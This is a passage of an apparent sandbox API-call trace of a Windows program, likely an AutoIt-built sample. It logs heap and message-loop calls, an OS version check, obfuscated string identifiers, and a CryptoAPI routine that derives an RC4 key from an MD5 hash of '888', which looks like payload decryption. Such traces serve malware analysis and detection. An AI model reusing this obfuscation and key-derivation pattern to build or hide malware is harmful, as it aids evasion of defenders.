out: hHeap=0x2af0000) returned 1 [0220.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0220.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0220.122] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0220.122] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0220.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0220.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0220.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0220.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0220.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0220.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0220.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0220.123] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0220.123] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0220.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab800 | out: hHeap=0x2af0000) returned 1 [0220.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7b8 | out: hHeap=0x2af0000) returned 1 [0220.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0220.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0220.123] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.123] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.123] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.123] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.123] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0220.123] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0220.123] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.123] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0220.123] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0220.123] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0220.123] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0220.123] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0220.124] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0220.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6f60, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0220.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0220.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6f20, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0220.124] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c4c8) returned 1 [0220.125] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.125] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.125] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0220.125] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.125] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0220.125] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.125] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.125] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.125] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.125] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.125] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.125] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0220.125] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.125] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0220.125] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.125] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.125] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.125] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.125] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.125] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.125] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.125] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0220.125] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.125] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0220.126] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.126] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.126] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.126] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.126] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.126] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.126] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.126] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0220.126] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.126] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0220.126] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.126] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.126] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0220.126] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0220.126] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0220.126] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0220.126] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0220.126] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.126] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.126] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0220.126] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0220.132] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0220.132] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0220.132] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0220.132] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0220.132] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.132] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.132] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.132] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0220.132] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.133] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0220.133] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.133] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.133] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0220.133] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.133] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0220.133] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.133] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.133] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0220.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaba70, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0220.133] CryptCreateHash (in: hProv=0xa7c4c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0220.133] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.133] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.133] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.133] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0220.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a72738, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0220.133] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0220.133] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0220.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a726a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0220.134] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.134] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0220.134] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.134] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0220.134] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.134] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.134] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.134] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0220.134] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aabba8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0220.134] CryptHashData (hHash=0x9e1c38, pbData=0x2a72738, dwDataLen=0x3, dwFlags=0x1) returned 1 [0220.134] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.134] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.134] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.134] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0220.134] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.134] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0220.134] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.134] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.134] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0220.134] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.134] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0220.134] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.135] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.135] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.135] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0220.135] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aabc68, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0220.135] CryptDeriveKey (in: hProv=0xa7c4c8, Algid=0x6601, hBaseData=0x9e1c38, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1cb8) returned 1 [0220.135] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.135] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.135] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.135] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.135] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.135] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.135] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0220.135] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0220.135] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0220.135] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0220.135] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0220.135] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.135] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0220.135] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6f00, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0220.135] CryptDestroyHash (hHash=0x9e1c38) returned 1 [0220.135] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.135] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.136] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, 